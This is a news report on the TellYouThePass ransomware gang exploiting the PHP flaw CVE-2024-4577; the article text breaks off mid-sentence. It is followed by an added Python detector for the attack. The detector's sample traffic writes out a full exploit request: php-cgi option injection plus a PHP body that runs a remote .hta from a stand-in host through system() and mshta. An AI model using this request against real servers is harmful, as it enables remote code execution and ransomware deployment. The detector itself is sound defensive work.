Ransomware Gang TellYouThePass Exploits PHP Vulnerability


Fraud Management & Cybercrime, Governance & Risk Management, Patch Management

Flaw Allows Unauthenticated Attackers to Execute Arbitrary Code

The TellYouThePass ransomware gang was quick to exploit a critical flaw in PHP. (Image: Shutterstock)

A ransomware operation with a history of exploiting widespread internet-facing vulnerabilities lost little time in making use of a critical-severity vulnerability in Windows installations of the web scripting language PHP.


Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof-of-concept script (see: Critical PHP Vulnerability Threatens Windows Servers).

The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of reappearing in new forms; Chinese network security firm Sangfor spotted it in March.

Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving webshell uploads and efforts to deploy ransomware.

Attackers use the PHP flaw to execute arbitrary PHP code, calling PHP's system function to run an HTML application file hosted on an attacker-controlled web server. The…
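As an added illustration, not code from the article or from Imperva, the following Python detector flags the two stages the paragraph above describes over constructed request data: the CVE-2024-4577 argument injection itself, and a PHP payload that calls system() to launch a remote HTML application (.hta). The argument-injection signature relies on a detail from the public CVE-2024-4577 advisory rather than this article: php-cgi on Windows under a "Best Fit" code page maps the soft hyphen (U+00AD, %AD in a URL) to a plain hyphen, so %ADd is parsed as the -d option and lets a client set INI directives. The sample requests, the host 203.0.113.10, the file name payload.hta and the use of mshta.exe to run the .hta are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Stage 1: CVE-2024-4577 argument injection. After percent-decoding, a soft
# hyphen byte (0xAD) directly followed by an option letter is php-cgi being
# handed a command-line switch via the query string. (Detail from the public
# advisory, not from the article.)
SOFT_HYPHEN_OPTION = re.compile(rb"\xad[a-zA-Z]")

# INI directives typically injected with -d once the switch is accepted.
INI_OVERRIDES = (b"allow_url_include", b"auto_prepend_file")

# Stage 2: the post-exploitation step the article describes: PHP code that
# calls system() to run an HTML application fetched from a remote host
# (assumed here to be launched through mshta.exe, the Windows HTA host).
SYSTEM_CALL = re.compile(r"system\s*\(", re.IGNORECASE)
REMOTE_HTA = re.compile(r"https?://[^\s'\"()]+\.hta\b", re.IGNORECASE)


def classify_request(path: str, body: str = "") -> list[str]:
    """Return the indicator names triggered by one request.

    `path` is the request target including the query string; `body` is the
    request body, which matters because auto_prepend_file=php://input makes
    php-cgi execute the body as PHP.
    """
    findings: list[str] = []

    query = path.split("?", 1)[1] if "?" in path else ""
    # Decode to bytes so the soft hyphen is seen as 0xAD whether it arrived
    # percent-encoded (%AD) or as a raw UTF-8 character (C2 AD).
    raw_query = unquote_to_bytes(query)

    if SOFT_HYPHEN_OPTION.search(raw_query):
        findings.append("php_cgi_argument_injection")
    if any(directive in raw_query.lower() for directive in INI_OVERRIDES):
        findings.append("ini_override_attempt")
    if SYSTEM_CALL.search(body) and REMOTE_HTA.search(body):
        findings.append("remote_hta_via_system")
    return findings


def scan(requests: list[tuple[str, str]]) -> dict[int, list[str]]:
    """Classify a batch of (path, body) pairs; only flagged requests are returned."""
    results = {}
    for index, (path, body) in enumerate(requests):
        findings = classify_request(path, body)
        if findings:
            results[index] = findings
    return results


# Constructed sample traffic (not real captures). Request 0 models the full
# chain: option injection enabling remote includes and php://input as the
# prepended file, with a PHP body that runs a remote HTA through system().
SAMPLE_REQUESTS = [
    (
        "/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
        "<?php system('mshta http://203.0.113.10/payload.hta'); ?>",
    ),
    ("/index.php?page=about", ""),
    # An em dash (E2 80 94) followed by 'd' must not be mistaken for %ADd.
    ("/search.php?q=%E2%80%94d", ""),
    ("/php-cgi/php-cgi.exe?%ADd+display_errors%3d1", ""),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        print(f"request {index}: {', '.join(findings)}")
```

The decoder deliberately works on bytes rather than text: a WAF or log pipeline that normalises the request to a Unicode string first may silently "best fit" the soft hyphen itself, which is exactly the conversion the vulnerability abuses.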
